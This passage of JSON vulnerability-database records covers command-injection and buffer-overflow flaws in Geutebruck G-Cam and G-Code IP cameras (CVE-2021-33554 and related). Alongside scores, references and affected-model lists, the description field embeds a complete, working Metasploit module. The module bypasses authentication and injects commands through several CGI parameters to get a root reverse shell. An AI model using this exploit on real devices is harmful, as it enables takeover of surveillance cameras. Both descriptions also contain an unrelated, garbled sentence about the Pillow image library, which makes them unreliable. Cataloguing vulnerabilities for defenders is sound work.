                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33554",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33554",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33554",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2084",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33554"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33554"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. The following multiple vulnerabilities exist in G-Cam E2 and G-Code, provided by GEUTEBRUCK. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549. The expected impact depends on each vulnerability, but may include the following. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * A remote third party triggers a buffer overflow in the counter parameter and executes arbitrary code - CVE-2021-33545 \u2025 * A remote third party triggers a buffer overflow in the name parameter and executes arbitrary code - CVE-2021-33546 \u2025 * A remote third party triggers a buffer overflow in the profile parameter and executes arbitrary code - CVE-2021-33547 \u2025 * A remote third party triggers a buffer overflow in the action parameter and executes arbitrary code - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. 
##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n          and exploits multiple authenticated arbitrary command execution vulnerabilities within\n          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n          remote code execution as the root user. 
\n        },\n\n        \u0027Author\u0027 =\u003e [\n          \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n          \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n          \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n        ],\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272021-33543\u0027],\n          [\u0027CVE\u0027, \u00272021-33544\u0027],\n          [\u0027CVE\u0027, \u00272021-33548\u0027],\n          [\u0027CVE\u0027, \u00272021-33550\u0027],\n          [\u0027CVE\u0027, \u00272021-33551\u0027],\n          [\u0027CVE\u0027, \u00272021-33552\u0027],\n          [\u0027CVE\u0027, \u00272021-33553\u0027],\n          [\u0027CVE\u0027, \u00272021-33554\u0027],\n          [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n          [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n          [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n                \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n                \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n                \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n               
 \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33548 - factory.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33550 - language.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33551 - oem.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027set\u0027,\n                \u0027enable\u0027 =\u003e \u0027yes\u0027,\n                \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027get\u0027,\n                \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                
\u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n          \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n          \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n        }\n      )\n    )\n  end\n\n  def firmware\n    res = send_request_cgi(\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n    )\n    unless res\n      print_error(\u0027Connection failed!\u0027)\n      return false\n    end\n\n    unless res\u0026.body \u0026\u0026 !res.body.empty?\n      print_error(\u0027Empty body in the response!\u0027)\n      return false\n    end\n\n    res_xml = res.get_xml_document\n    if res_xml.at(\u0027//firmware\u0027).nil?\n      print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n      return false\n   
 end\n    raw_text = res_xml.at(\u0027//firmware\u0027).text\n    if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n      raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n    else\n      print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n      false\n    end\n  end\n\n  def check\n    version = firmware\n    if version == false\n      return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n    end\n\n    rex_version = Rex::Version.new(version)\n    vprint_status(\"Found Geutebruck version #{rex_version}\")\n    if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n      return CheckCode::Appears\n    end\n\n    CheckCode::Safe\n  end\n\n  def exploit\n    print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n    method = target[\u0027http_method\u0027]\n    if method == \u0027GET\u0027\n      http_method_vars = \u0027vars_get\u0027\n    else\n      http_method_vars = \u0027vars_post\u0027\n    end\n\n    http_vars = target[\u0027http_vars\u0027]\n    http_vars.each do |(k, v)|\n      if v.include? \u0027PLACEHOLDER_CMD\u0027\n        http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n      end\n    end\n\n    print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n    send_request_cgi(\n      {\n        \u0027method\u0027 =\u003e method,\n        \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n        http_method_vars =\u003e http_vars\n      }\n    )\n    print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33554"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33554"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33554",
            "trust": 2.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "164036",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2021090031",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2084",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33554",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33554"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33554"
          }
        ]
      },
      "id": "VAR-202109-0850",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T20:43:15.595000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK\u2019s web portal (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Geutebr\u00fcck G-Cam E2 and G-Code Fixes for command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158064"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33554"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.6,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.7,
            "url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2021090031"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
          },
          {
            "trust": 0.1,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "http://geutebruck.com"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33554"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33554"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33554"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33554"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-09-02T15:36:40",
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-13T18:15:23.730000",
            "db": "NVD",
            "id": "CVE-2021-33554"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2022-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2023-11-07T03:35:52.423000",
            "db": "NVD",
            "id": "CVE-2021-33554"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in GEUTEBRUCK G-Cam E2 and G-Code",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system command injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0858

    Vulnerability from variot - Updated: 2025-01-30 20:43

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the action parameter, which may allow an attacker to remotely execute arbitrary code. G-Cam E2 and G-Code, provided by GEUTEBRUCK, contain the following multiple vulnerabilities. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 * Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549. The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. There is currently no information about this vulnerability; please follow CNNVD or manufacturer announcements.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0858",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
